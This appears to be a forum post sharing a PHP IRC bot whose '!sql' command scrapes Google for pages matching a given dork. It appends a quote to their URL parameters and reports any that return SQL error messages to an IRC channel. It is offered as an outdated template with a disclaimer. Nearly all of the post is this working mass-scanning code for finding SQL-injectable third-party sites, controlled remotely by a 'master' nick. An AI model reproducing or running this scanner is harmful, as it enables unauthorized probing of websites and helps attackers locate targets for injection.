Hey guys,
This script could only be used as template to create a PHP-based IRC Client/Bot, its vulnerability scanning functions are now useless.
This one comes from the Dark Ages of GRnet, enjoy 🙂
In any case I do not have any responsibility on how the script runs and what errors might pop up on your computer.
<?php set_time_limit(0); /**  * @author Atlantean.  */ //########################INFORMATION################################## $server = "global.irc.gr"; $port = 6667; $me = "php_scanner"; $channel = "#scripting"; $identify = "id"; $master = array("Atlantean"); //EDIT THIS $max_results = 500; // maximum Google results // $threads = 10; //URLS TO test IN the same time!! //##################################################################### $search = array("mysql_num_rows()", "mysql_fetch_rows()", "main(", "extract()",    "mysql_result()", "Syntax Error", "You Have An error", "mysql error",    "SQL ERROR", "Warning: "); //###############################SERVER WRITE########################## $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); if (!socket_connect($socket, $server, $port)) {    echo "\n[-]Unable To connect...\n\n\n";    exit; } socket_write($socket, "USER php PHP :PHP Bot\nNICK $me\nJOIN :$channel\n"); //###############################Encode The Dork############################# function encodeDork($s) {    $tmp = "";    for ($i = 0; $i < strlen($s); $i++)    {        $tmp .= "&#" . hexdec(bin2hex($s[$i])) . ";";    }    return urlencode($tmp); } //###############################cURL MULTI THREAD############################# function ExecHandle(&$curlHandle) {    $flag = null;    do    {        curl_multi_exec($curlHandle, $flag);    } while ($flag > 0); } while ($read = socket_read($socket, 2048)) {    $cmd = explode(" ", $read);    $nick = explode(':', $cmd[0]);    $nick = explode('!', $nick[1]);    $nick = strtolower($nick[0]);    switch ($cmd[1])    {        case "KICK":            if ($cmd[3] == $me)            {                socket_write($socket, "\nJOIN :" . $channel . "\n");            }            break;        case "PRIVMSG":            if (in_array($nick, $master))            {                switch (str_replace(array(chr(10), chr(13)), '', $cmd[3]))                {                    case ":!join":                        socket_write($socket, "\nJOIN :" . $cmd[4] . "\n");                        break;                    case ":!exit":                        exit(socket_write($socket, "\nQUIT :Connection Lost\n"));                        break;                    case ":!part":                        socket_write($socket, "\nPART :" . $cmd[4] . "\n");                        break;                    case ":!sql":                        if (!isset($cmd[4]))                        {                            socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .                                "12[-] Enter Dork!\r\n");                        } else                        {                            socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .                                "12[+] SQL Vulnerabilty Scan Started ...\nPRIVMSG $channel :" . chr(3) . "4$nick " .                                chr(3) . "12[+] Dork : $cmd[4] \r\n");                            $vuln_array = array();                            $google = "http://www.google.com/search?q=" . encodeDork($cmd[4]) . "&start=0";                            $ch = curl_init($google);                            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);                            curl_setopt($ch, CURLOPT_HEADER, 0);                            $ret = curl_exec($ch);                            curl_close($ch);                            if (stristr($ret, '302 Moved') != false)                            {                                socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) . "12[-] Banned From Google!! \r\n");                                break;                            }                            preg_match_all("/of( about)* <b>([\d,]+)<\/b>/", $ret, $max);                            $max = str_replace(",", "", $max[2][0]);                            $max = $max > $max_results ? $max_results : $max;                            $i = 0;                            while ($i < $max)                            {                                $ch = curl_init("http://www.google.com/search?q=" . encodeDork($cmd[4]) . "&start=" . $i);                                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);                                curl_setopt($ch, CURLOPT_HEADER, 0);                                $ret = curl_exec($ch);                                preg_match_all("/<h3 class=r><a href=\"(.*?)\"/", $ret, $links);                                if (@$links[1])                                {                                    foreach ($links[1] as $l)                                    {                                        if (strpos($l, '=') != false)                                        {                                            $url = explode('=', $l);                                            $url = $url[0] . "='";                                            if (!in_array($url, $vuln_array))                                            {                                                array_push($vuln_array, $url);                                            }                                        }                                    }                                }                                curl_close($ch);                                $i = $max > 10 ? $i += 10 : $i++;                            }                            array_unique($vuln_array);                            sort($vuln_array);                            socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) . "12[+] Got " . count($vuln_array) . " Valid URLs! Injection Started...\r\n");                            $p = 0;                            $o = $threads;                            $curlHandle = curl_multi_init();                            do                            {                                $tmp = count($vuln_array);                                for ($i = 0; $i < $threads && $i < $tmp; $i++)                                {                                    $cURL[$i] = curl_init($vuln_array[$i]);                                    curl_setopt($cURL[$i], CURLOPT_URL, $vuln_array[$i]);                                    curl_setopt($cURL[$i], CURLOPT_HEADER, 0);                                    curl_setopt($cURL[$i], CURLOPT_RETURNTRANSFER, true);                                    curl_multi_add_handle($curlHandle, $cURL[$i]);                                }                                ExecHandle($curlHandle);                                for ($i = 0; $i < $threads && $i < $tmp; $i++)                                {                                    $source[$i] = curl_multi_getcontent($cURL[$i]);                                }                                for ($i = 0; $i < $threads && $i < $tmp; $i++)                                {                                    foreach ($search as $error)                                    {                                        if (stristr($source[$i], $error) != false)                                        {                                            socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .                                                "12[+] Possible Bug Found: $vuln_array[$i]\n");                                            $p++;                                            break;                                        }                                    }                                }                                for ($i = 0; $i < $threads && $i < $tmp; $i++)                                {                                    curl_multi_remove_handle($curlHandle, $cURL[$i]);                                    unset($vuln_array[$i]);                                }                                sort($vuln_array);                                socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .                                    "12[+] Scanned $o...\r\n");                                $o += $threads;                                unset($source);                                unset($cURL);                            } while (count($vuln_array) > 0);                            curl_multi_close($curlHandle);                            unset($vuln_array);                            unset($source);                            unset($cURL);                            socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) . "12[+] Done. $p Bugs Found.\r\n");                        }                        break;                }            }            break;    }    if ($cmd[0] == "PING")    {        socket_write($socket, "PONG " . $cmd[1] . "\n");    } } socket_close($socket); ?>